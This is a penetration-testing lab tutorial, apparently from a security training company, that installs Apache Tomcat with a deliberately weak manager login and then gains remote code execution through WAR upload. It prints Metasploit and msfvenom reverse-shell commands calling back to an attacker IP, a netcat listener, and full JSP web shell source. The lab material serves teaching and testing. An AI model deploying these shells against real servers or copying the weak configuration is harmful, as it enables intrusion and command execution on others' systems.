Tomcat Penetra�on Tes�ng

1|Page
 Tomcat Penetration Testing

Contents
Introduc�on ............................................................................................................................................ 3
Lab Setup................................................................................................................................................. 3
Configura�on .......................................................................................................................................... 8
Enumera�on.......................................................................................................................................... 11
Exploita�on using Metasploit Framework ............................................................................................ 11
Exploi�ng Manually (Reverse Shell) ...................................................................................................... 12
Conclusion ............................................................................................................................................. 20

2|Page
 Tomcat Penetration Testing

Introduction
Tomcat Penetra�on Tes�ng is essen�al for iden�fying vulnerabili�es in Apache Tomcat, a widely
used web server and servlet container. Originally, the Apache So�ware Founda�on developed
Tomcat to serve as a demonstra�on pla�orm for Java Servlet and JavaServer Pages (JSP)
technologies, which power Java web applica�ons. Over �me, Tomcat expanded its capabili�es to
support addi�onal Java web technologies.

Moreover, a notable feature of Tomcat is its support for deploying web applica�ons using WAR (Web
Applica�on Archive) files. These files bundle together all the components of a web applica�on,
including code, pages, and files, making deployment simpler. As a result, Tomcat allows users to
upload and run these WAR files, enabling them to host their applica�ons on the internet.

In addi�on to WAR files, Tomcat also supports the deployment of JSP pages. JSP is a technology that
enables developers to create dynamic web pages using Java. Therefore, Tomcat can execute these
JSP pages, making it a versa�le pla�orm for hos�ng a wide range of web applica�ons.

By default, Tomcat supports the use of WAR files and JSP pages. However, administrators can
configure se�ngs to ensure security and control over file uploads, thereby enhancing the overall
safety of the server.

Lab Setup
In this ar�cle, we are going to setup the Tomcat server on the ubuntu machine and exploit the file
upload vulnerability. The following are the machines:

Target Machine: Ubuntu (192.168.1.5)

Atacker Machine: Kali Linux (192.168.1.7)

Installa�on

Apache Tomcat relies on Java, meaning you'll need to have the Java JDK installed on your server. You
can install it by running the command below:

apt install openjdk-11-jdk

3|Page
 Tomcat Penetration Testing

Add a new user by the name tomcat using the following command:

useradd -m -U -d /opt/tomcat -s /bin/false tomcat

Next, download the Tomcat tar.gz file from the official website.

4|Page
 Tomcat Penetration Testing

Then, download the latest version from the website into the ubuntu machine and extract the
downloaded files.

wget https://archive.apache.org/dist/tomcat/tomcat-10/v10.0.20/bin/apache-tomcat-10.0.20.tar.gz
tar -xvf apache-tomcat-10.1.20.tar.gz

5|Page
 Tomcat Penetration Testing

Move the extracted folder in the /opt/tomcat directory, give the ownership permissions to tomcat
user and set the execu�on permission on binary files.

mv apache-tomcat-10.1.20/* /opt/tomcat
chown -R tomcat: /opt/tomcat
sh -c 'chmod +x /opt/tomcat/bin/*.sh '

Create a tomcat.service file in the /etc/systemd/system/ directory and add the following content in
the file:

[Unit]
Description=Apache Tomcat
After=network.target

[Service]
Type=forking

User=tomcat
Group=tomcat

Environment=JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
Environment=CATALINA_PID=/opt/tomcat/tomcat.pid
Environment=CATALINA_HOME=/opt/tomcat
Environment=CATALINA_BASE=/opt/tomcat
Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

ExecStart=/opt/tomcat/bin/startup.sh
ExecStop=/opt/tomcat/bin/shutdown.sh

6|Page
 Tomcat Penetration Testing

ExecReload=/bin/kill $MAINPID
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Reload the systemd daemon to apply the changes using the following command:

systemctl daemon-reload
Also, enable the tomcat service to start at system reboot.

systemctl enable --now tomcat

Checking the status of the tomcat server:

systemctl status tomcat

7|Page
 Tomcat Penetration Testing

Configuration
A�er the installa�on is complete, its �me to configure the Tomcat server.

To create admin user password, make changes in the following file:

nano /opt/tomcat/conf/tomcat-users.xml
Add the following code above the </tomcat-users>:

<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="admin" password="password" roles="admin-gui,manager-gui"/>

8|Page
 Tomcat Penetration Testing

To enable remote access for Tomcat Manager, make the following changes in the context.xml file
present in the manager and host-manager directory.

nano /opt/tomcat/webapps/manager/META-INF/context.xml
nano /opt/tomcat/webapps/host-manager/META-INF/context.xml
Remove the following line from both the above files as shown below:

9|Page
 Tomcat Penetration Testing

Once done with the changes, restart the tomcat service in ubuntu.

systemctl restart tomcat

Observe that the Tomcat server is up and running on port 8080 in the ubuntu machine.

10 | P a g e
 Tomcat Penetration Testing

Enumeration
A�er the installa�on and configura�on is complete, now star�ng the enumera�on phase.

Using Kali linux as an atacker machine, ini�al enumera�on can be performed using nmap.

nmap -p 8080 -sV 192.168.1.5

Exploitation using Metasploit Framework

First trying to exploit the func�onality using Metasploit as an exploit is already available for the
tomcat file upload vulnerability. The exploit used here is exploit/mul�/htp/tomcat_mgr_upload.

Inside Metasploit, type the below given commands to run the exploit:

11 | P a g e
 Tomcat Penetration Testing

use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.1.5
set report 8080
set httpusername admin
set httppassword password
show targets
set target 2
set payload linux/x86/meterpreter_reverse_tcp
exploit

From above it can be seen that a reverse shell is obtained and the commands can be executed using
the meterpreter shell.

Exploiting Manually (Reverse Shell)

Addi�onally, atackers can also perform the above exploita�on process manually. To do that, they
first need to create a .war file using msfvenom.

12 | P a g e
 Tomcat Penetration Testing

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.7 lport=1234 -f war > shell.war

Next, a�er genera�ng the shell.war file, atackers must upload it to the Tomcat Manager App.

To access the Manager App, users must provide basic authen�ca�on. Typically, the username is
admin and the password is password to gain access to the Tomcat manager app.

Once logged in, they can upload the previously created shell.war file using the WAR file deployment
func�onality.

13 | P a g e
 Tomcat Penetration Testing

Once the file is uploaded it can be seen in the uploaded files sec�on.

Before accessing the uploaded file, start a netcat listener on port 1234.

rlwrap nc -lvnp 1234

Click on the /shell to access the file to obtain a reverse shell.

14 | P a g e
 Tomcat Penetration Testing

The reverse shell is obtained at port 1234.

Exploi�ng Manually (Web Shell)

To get a web shell, atackers can use a .war file that contains .jsp files. Once the .war file is uploaded
to the server, it provides access to the webshell.

In order to create a .war file containing .jsp files, users must install Java in the Kali Linux machine.

apt install openjdk-11-jdk

15 | P a g e
 Tomcat Penetration Testing

Now, create a webshell directory, within it we will place the index.jsp file.

mkdir webshell
cd webshell
nano index.jsp

Copy the following code in the index.jsp file for the web shell.

<FORM METHOD=GET ACTION='index.jsp'>

<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);

16 | P a g e
 Tomcat Penetration Testing

BufferedReader sI = new BufferedReader(new

InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>

A�er the index.jsp file is created, the package can now be created a�er conver�ng the directory into
a .war file.

jar -cvf ../webshell.war *

A�er the webshell.war file is created, uploading it in the deploy func�onality.

17 | P a g e
 Tomcat Penetration Testing

The index.jsp page can be accessed within the uploaded webshell directory and a webshell is
obtained.

An alterna�ve way to do the above manual exploita�on can by downloading the cmd.jsp file and
crea�ng a webshell.war file using zip.

18 | P a g e
 Tomcat Penetration Testing

The webshell jsp file can be downloaded from here:

htps://github.com/tennc/webshell/tree/master/fuzzdb-webshell/jsp

Next, a�er the cmd.jsp file is downloaded, a revshell.war file can be created using the following
command:

zip -r revshell.war cmd.jsp

19 | P a g e
 Tomcat Penetration Testing

Again, repeat the same procedure as discussed earlier, a�er uploading the revshell.war file in the
deploy func�onality. The web shell is obtained a�er accessing the file at the path:
htp://192.168.1.5:8080/revshell/cmd.jsp

Conclusion
In essence, Apache Tomcat remains a preferred choice for deploying Java web applica�ons, offering
a blend of versa�lity and security that caters to the diverse needs of developers and administrators
alike. Nevertheless, due to misconfigura�ons, atackers can abuse it to perform unintended ac�ons
such as Remote Code Execu�on.

20 | P a g e
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in